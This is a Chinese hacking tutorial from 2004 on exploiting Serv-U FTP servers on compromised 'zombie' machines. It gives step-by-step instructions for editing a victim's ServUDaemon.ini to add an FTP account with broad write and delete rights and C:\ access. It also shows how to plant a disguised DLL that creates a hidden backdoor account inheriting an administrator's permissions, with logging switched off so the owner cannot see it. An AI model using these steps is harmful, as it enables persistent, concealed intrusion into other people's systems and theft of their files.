2004年11月15日









如何利用肉鸡上的Serv-U Ftp服务器
 

之一:添加一个用户


很多肉鸡安装了serv-U服务器,我们可以把它利用起来,下面的方法是可以通过telnet或者nc命令行直接修改serv-U的参数而利用之。


在serv-U的目录下有一个servudaemon.ini,关键是修改servudaemon.ini,第一步,当然是要先把对方的servudaemon.ini下载回来,在本机把它修改好。至于怎么把这个文件取回来不是这里讨论的问题,方法很多。


下面请看一个servdaemon.ini的范例,<>中是我写的说明文字,不是文件中的文字。


[GLOBAL] <定义一些全局参数>
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBLH71T7nA+cDAgAIUm9nZXJMZWUSbGls


aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA
ProcessID=1748
[DOMAINS] <在这里定义域名及IP,端口号>
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0
[Domain1] <用户名的定义>
User1=Anonymous|1|0 <第一个用户是anonymous,即匿名用户,允许匿名用户访问>
User2=1|1|0 <第二个用户是1>
User3=2|1|0 <第三个用户是2>
[USER=Anonymous|1] <用户”anonymous”的定义>
HomeDir=d:\wutemp <用户anonymous的根目录>
RelPaths=1 <锁定在根目录,如果不锁定在根目录可以把该行删除>
TimeOut=600
Note1=”Wizard generated account”
Access1=D:\WUTemp|RLP <用户anonymous权限设置在此处,R表示读文件,L表示目录列表,最后一个P必须有>
[USER=2|1] <用户”2″的定义>
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3 <用户密码设定,我不知道怎么破这个密码,如果不设密码可以把该行删除>
HomeDir=D:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RLP <用户”2″可以读取d:\temp目录下的文件,所以可以下载文件>
[USER=1|1] <用户”1″的定义>
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C
HomeDir=d:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RWLP <用户”1″对d:\temp有列目录的权利,可以读写该目录下的文件>


权限设定具体说明:
RL 只能读文件,下载文件
RWL 可以写文件,所以可以上载文件
RWML M是可以删除的权限
RWAMEL A是添加权限,E是执行权限
RWLCD C是目录创建权限,D是目录删除权限


OK,所以首先是把对方的servudaemon.ini下载到本地的机器上,根据自己的需要把这个文件修改好,然后再传上去覆盖原文件。


修改的步骤是在[DOMAIN1]中先添加用户名称,如上例中已经有三个用户anonymous、1、2,再添加一个用户3,密码为空,在d:\temp目录下可以读写文件、创建删除目录,不锁定在本目录,同时对C:\有访问权限。


先在[Domain1]下增加一个用户,如下:
user4=3|1|0


然后再增加一个段,说明用户”3″的权限
[user3|1]
HomeDir=d:\temp
TimeOut=600
Access1=D:\temp|RWLCDP
Access2=C:\|RLP


之二:添加一个隐蔽的帐号
在 Serv-U 中建立隐藏用户(本地通过,未经肉鸡测试~~希望大家完善本文)


在如今的 FTP 服务段软件中,Serv-U 以其简单易用性成为广大管理员的首选,当我
们控制一台肉鸡后,如果它采用 Serv-U 管理 FTP ,我们该如何建立一个隐藏的 FTP 账
户来下载他的东东呢?


我们可以采用 Serv-U Assistant 这个软件,可以到作者网页 http://www.katkat.com/
者在华军下载(目前版本为1.01)


这个软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库,实现的原理为”帐
号-映射”,建立一个或多个帐号”映射”,当在 Serv-U 中设置好一个固定帐号(即Serv-U
的帐号)后,”映射帐号”就继承了这个固定帐号的所有权限设置,每个”映射帐号” 有各
自的登录密码。


下载压缩文件 AssServU.zip,解压后得到以下文件:
AssServU.dll ——– 扩充功能库
AssServU.exe ——– 管理主程序
AssServU.ini ——– 配置文件
AssServU.mdb ——– 数据库文件
AssReadme.mht ——- 自述文件


我们的目的是为了隐藏我们 FTP 账号,因此第一步我们要获取肉鸡上的一个 Serv-U
的账户名(仅账户名而已):3389图形界面可以通过 ServUAdmin.exe 获得;命令行下可以
通过 ServUDaemon.ini 获得,当然最好获得权限比较大的用户名(因为我们的隐藏账号的
权限与他的相同)


第二步:在自己的机器上做好配置:首先为了隐藏的需要,我们将assServU.mdb复制
一份为ServU.dat ,将assServU.dll改名为ServU.dll ;
双击 assServU.exe ,在 Settting 选项卡下的 Log options 中去掉 Log system
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾(这是
为了系统不记录日志);在 Account Datasource 中选 Custom ,在 Connection string 点
Set ,在”连接”选项卡中的”1。选择或输入数据库名称”中将 AssServU.mdb 改为
Servu.dat ,然后点”确定”,在退回 Setting 选项卡后点 Save 。
在 Account 选项卡下添加用户, Username 为你想添加的用户,如:hacker, Password
为你的密码,如:123, Serv-U account 为第一步中你选择的权限较大的用户,如:admin,
然后点 Save 按钮。


好了,配置完成。


第三步:上传我们的 ServU.dat 和 ServU.dll ,修改肉鸡的 ServUDaemon.ini 文件,添加
以下字段:
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然后重起Serv-U 服务


这样你就可以用隐藏账号登陆了,此时登陆账号还是第一步你选择的账号,但密码格式
为”你的用户名=密码”,如果你像第二步那样设置的话,登陆名就为admin,密码为hacker=111


hehe,这样管理员在管理界面什么都看不出来
OK,game over!